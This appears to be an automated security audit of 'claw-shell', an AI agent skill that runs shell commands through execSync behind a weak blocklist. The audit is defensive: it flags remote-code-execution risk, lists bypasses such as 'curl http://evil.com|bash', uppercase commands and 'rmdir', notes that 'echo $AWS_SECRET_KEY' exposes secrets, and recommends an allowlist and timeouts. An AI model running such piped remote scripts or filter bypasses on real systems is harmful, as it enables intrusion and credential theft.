Skill Trust Decision
claw-shell
Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.
Most direct threat evidence
High RCE
Unrestricted shell execution with weak safety controls The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
handler.js:18 Why this conclusion was reached
1/4 dimensions flagged Pass
Declared vs actual capability
Declared resources and inferred behavior are broadly aligned.
Review
Hidden execution and egress
1 lower-risk artifacts were extracted and still need context.
Block
Attack chain and severe findings
The report includes 0 attack-chain steps and 1 severe findings.
Review
Dependencies and supply chain hygiene
Dependency information is incomplete, so supply-chain confidence stays limited.
What drove the risk score up
Unrestricted shell execution via execSync +20
Full shell access is powerful and declared, but safety measures are minimal
Weak blocklist-based safety filter +15
Filter can be bypassed with variations like 'rmdir', symlinks, or 'curl http://evil.com|bash'
No timeout on execSync +8
Commands could hang or consume excessive resources
Single-character command variations bypass filter +5
'sudo' variations, 'DD' uppercase, embedded commands could slip through
Most important evidence
High RCE
Unrestricted shell execution with weak safety controls
The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
handler.js:18 Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.
Medium RCE
Dangerous commands bypass filter
Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.
handler.js:18 Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.
Medium Sensitive Access
Indirect environment variable access
While not explicitly accessing environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'
handler.js:14 Consider sanitizing commands that query environment variables or restrict to specific paths.
Low RCE
No command timeout configured
execSync calls have no timeout specified, allowing commands to hang indefinitely.
handler.js:29 Add timeout option to execSync calls.
Declared capability vs actual capability
Shell Pass
Declared WRITE
→ Inferred WRITE
execSync used in handler.js:1,7,10 Filesystem Pass
Declared WRITE
→ Inferred WRITE
Shell can execute any file operation Network Pass
Declared WRITE
→ Inferred WRITE
Shell can execute curl/wget/netcat Environment Pass
Declared NONE
→ Inferred READ
Shell commands can read $ENV vars Clipboard Pass
Declared NONE
→ Inferred NONE
— Browser Pass
Declared NONE
→ Inferred NONE
— Database Pass
Declared NONE
→ Inferred NONE
— Suspicious artifacts and egress
Medium External URL
https://x.com/... SKILL.md:39
Dependencies and supply chain
There are no structured dependency warnings.
File composition
3 files · 106 lines
JavaScript 1 files · 57 linesMarkdown 1 files · 44 linesJSON 1 files · 5 lines
Files of concern · 2
handler.js Unrestricted shell execution with weak safety controls · Dangerous commands bypass filter · Indirect environment variable access · No command timeout configured
SKILL.md https://x.com/...
Other files · _meta.json
Security positives
Purpose and capabilities are clearly documented in SKILL.md
Uses dedicated tmux session 'claw' for isolation
Basic safety filter exists for clearly dangerous commands
No hidden functionality or obfuscation detected
No credential harvesting or data exfiltration observed
Single-purpose tool with focused functionality